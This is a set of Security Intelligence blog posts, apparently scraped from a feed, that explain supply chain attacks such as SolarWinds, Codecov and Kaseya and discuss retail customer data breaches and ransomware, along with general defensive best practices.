Ransomware attacks may not be the most costly of customer data security threats, but they are on the rise, especially in the retail sector.

COVID-19’s Impact on the Future of IT Budgets

IT spending in the retail sector could drop by as much as 15% in the aftermath of the global pandemic. CISOs will need to spend smartly and do more with less.

The post Roundup: Customer Data and Retail Security in the News appeared first on Security Intelligence.

The past two years have delivered major disruptions for supply chains. The pandemic pushed supply chain attack issues front-and-center, with disruptions up 67% in 2020 and problems expected to persist as global markets adjust to ‘new normal’ operations.

Increasing reliance on digital supply solutions, however, has also set the stage for increasing supply chain attacks. These attacks are expected to increase four-fold in 2021.

Here’s what enterprises need to know about supply chain threats. Check out the current state of supply chain security, plus what steps you can take to reduce total risk.

What Is a Supply Chain Attack?

A supply chain attack occurs when threat actors compromise enterprise networks using connected applications or services owned or used by outside partners, such as suppliers. Sometimes, experts also refer to these as third-party or value-chain attacks.

For threat actors, the appeal of supply chain attacks is trust. Applications and services used by enterprises have often been trusted and vetted by security teams. So, they often have access to sensitive or valuable internal data. If attackers can move sideways from connected supply chain apps into the larger enterprise network itself, they could steal, encrypt or destroy critical data and cost companies millions in both repair costs and reputation damage.

As networks grow, this problem compounds. Third-party suppliers are often using software from other business partners, who in turn have their own outside app connections. Therefore, a supply chain attack may start several companies removed from the intended target, making it harder to spot.

A successful supply chain attack can be a major blow. When networking tools supplier Solar Winds was compromised in late 2020, more than 18,000 companies worldwide were affected.

The State of Supply Chain Cybersecurity in 2021

As noted above, supply chain attacks will increase in 2021. Part of this expansion comes from increased application environment complexity: companies embrace the need for agile and adaptable supply chains that are resistant to future disruptions. After all, broadening the number of connected apps and services helps enterprises better navigate changing market conditions. It also creates a larger attack surface for threat actors. If a vulnerability does crop up, it also makes it more difficult to find and remove supply chain threats before they become bigger issues.

Notable 2021 Supply Chain Attacks

Supply chain attacks are off to a strong start in 2021. For example, in April 2021 DevOps tool provider Codecov disclosed that their Bash script uploader was compromised by malicious actors. This allowed the attackers to capture information stored by Codecov customers in continuous information (CI) environments. Third-party investigators also found that attackers might have been able to “raid additional resources” and gained access to user credentials, which could, in turn, lead to even larger breaches.

In July 2021, the REvil gang compromised software supplier Kaseya’s network management package and used this software as a way to spread ransomware across Kaseya’s customers. According to NPR, more than 200 U.S. companies found their networks paralyzed by ransomware attacks after the Kaseya compromise.

Worth noting? Recent research from the European Union Agency for Cybersecurity found that 66% of attacks focused on supplier code. This meant even strong internal defenses may not be enough to mitigate the impact of supply chain attacks.

Common Supply Chain Attack Methods

The goal of supply chain attackers is to compromise trusted services. From there, they can gain access to more valuable corporate resources. One common compromise approach is phishing. Successful phishing attacks can reveal account and password data, in turn allowing attackers to examine source code without triggering network defenses. Malware is also commonly used to infiltrate networks and exfiltrate key source code, which attackers can then modify and re-insert.

Some of the most common supply chain threat vectors include:

• Third-party software providers
• Data storage solutions
• Development or testing platforms
• Website building services.

In each case, these software solutions and services require access to critical aspects of enterprise infrastructure. That opens up a potential pathway for malicious actors.

Best Practices for Supply Chain Security

When it comes to supply chain attacks, attackers are always looking for the weakest link. As a result, even robust enterprise defenses may not be enough to protect key assets. After all, the trusted nature of these third-party apps means they’re often not subject to the same scrutiny. This creates an opening for attackers: If they go far enough back along the supply chain, chances are they’ll find a vulnerability they can exploit and start moving upward toward critical apps.

To help reduce the risk of supply chain threats, security best practices are critical. These include:

1) Assessing current strategies – Better supply chain security starts with current strategies: Are they effective at mitigating supply chain threats? Do they align with compliance requirements? Can they adapt to evolving risk realities?

2) Testing, testing, testing – Regular penetration testing and vulnerability scans can help identify potential supply chain security weak points. From there, you can close down potential compromise pathways.

3) Identification and encryption – By identifying and encrypting highly sensitive data in their environment, enterprises can reduce the reach of supply chain attacks that do occur. Even if malicious actors gain access, they won’t be able to leverage protected assets.

4) Third-party risk management – The supply chain software landscape is more complex today than ever before. Therefore, companies must conduct an in-depth analysis of supplier security practices. They need to break down internal operational silos to ensure all departments are on the same page when it comes to protection.

5) Zero trust frameworks – By moving to an ‘always verify, never trust’ framework, enterprises can create a functional front line of defense. Zero trust requires even familiar apps and services to pass authentication checks before gaining network access.

The right security tools also play a role in reducing supply chain attack risk. Here, enterprises are often best-served by solutions that leverage blockchain for secure transactions, artificial intelligence for improved threat detection and cloud-based threat analysis for rapid risk assessment.

Solving for Supply Chain Attacks

Bottom line? It all comes down to trust.

Supply chain applications are necessary for enterprises to deliver services at scale. However, the same trust that reduces complexity also increases total risk. To mitigate the impact of supply chain attacks, enterprises must take control of third-party connections using both tools and tactics designed to detect unexpected actions, discover malicious code and deny access to potential threats.

The post Supply Chain Attack: What It Is (and What to Do About It) appeared first on Security Intelligence.

Retail data breaches involving customer data happen often today. However, they tend to be smaller in
size than health care, finance or government breaches. So, the general public notices them less. Yet, they happen more often than realized. Why? And how can you defend against them?

Human Error in Customer Data Theft

All types of retail outlets could fall prey to data leaks, and not all breaches come from bad intent. For example, CVS Health data could be a gold mine because of the mix of health, financial and insurance records. However, the drugstore chain’s recent breach of more than 1 billion records appears to be caused by human error. The records, according to ThreatPost, “were left in the database of a third-party, unnamed vendor – exposed, unprotected, online,” likely because of a cloud misconfiguration that left the data vulnerable.

Wegmans Food Market is a grocery store chain, but its customer data is just as attractive to attackers as a drug store’s data. Another cloud misconfiguration affecting databases left personally identifiable information (PII) of its Shoppers Club members and anyone with a Wegmans.com account open for potential compromise. Kroger was the victim of a similar style of data leak, but this misconfiguration impacted human resources data.

Outside Attackers

The retail industry is not immune to ransomware. In fact, this type of retail cyberattacks soared during the pandemic, increasing by 1280% from the beginning of 2020 to the end of the year. Fashion retailer Guess suffered a ransomware attack in February 2021 which exposed customers’ sensitive information, but it wasn’t revealed until the summer. The REvil gang held the data of a Swedish grocery store’s data ransom for $70 million. Bose also disclosed a customer data breach due to a ransomware attack this year, accessing the PII of current and former employees.

Third-party data breaches are also a threat to retail. Baby and children’s clothing retailer Carters’ was the victim of a data leak of customer data due to poor security around shortened URLs used by a vendor. And of course, the most infamous retail data breach of all, the Target breach, was the result of a third-party vulnerability, impacting the company’s point-of-sale devices and software.

Protecting Customer Data

With the multiple ways attackers leak and steal data, as well as the fines and financial damage involved, any retail company should hold keeping data safe at top of mind.

Some basic and simple approaches span industries:

• Encrypting sensitive data, both for customers and employees
• Upgrade and strengthen malware protection
• Restrict access across the cloud to decrease risk of misconfiguration
• Better training for employees. Add security awareness tips to customers on the company website, too. This will help prevent mistakes that put their data at risk.
• Consider using a Consumer Identity and Access Management (CIAM) platform to offer better data management.

How CIAM Works

Managing data and tracking the identities attached to data is tough enough when only dealing with insider information. Organizations with employees and contractors have ideal environments for identity and access management systems (IAM). Adding customer data and other external IDs adds another layer. CIAM offers customers some control over their personal data, beginning when they register and sustained throughout the customer/retailer life cycle. CIAM can track things like customer behavior and risk profiles, and address potential risk through functions like access requests or by location detection. IAM offers security and privacy checks for static identities; CIAM offers the same for IDs that are always shifting.

The retail industry manages a lot of PII for customers and employees, and that requires multi-faceted approaches. Your customers are trusting you with their personal lives. Make sure you act like it.

The post What’s Behind the Leaks of Customer Data From Retailer Databases? appeared first on Security Intelligence.